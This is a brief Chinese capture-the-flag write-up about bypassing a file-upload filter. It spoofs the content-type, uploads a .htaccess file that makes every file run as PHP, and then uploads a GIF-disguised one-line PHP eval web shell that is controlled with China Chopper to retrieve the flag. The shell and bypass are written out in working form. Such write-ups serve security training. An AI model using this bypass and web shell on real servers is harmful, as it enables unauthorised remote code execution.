这题我先上传了一个正常的图片,一直传不上。奇了怪了,原来是对图片大小还有限制。
传个空的jpg文件上传成功。
上传php2, php3, php4, php5, phps, pht, phtm, phtml后缀也都爆出ph的检查。
上传.htaccess文件修改content-type为image/jpeg可绕过检查。
内容为
SetHandler application/x-httpd-php
传个webshell继续修改content-type,菜刀连接。
GIF89a? <script language="php">eval($_POST['a']);</script>
根目录找到flag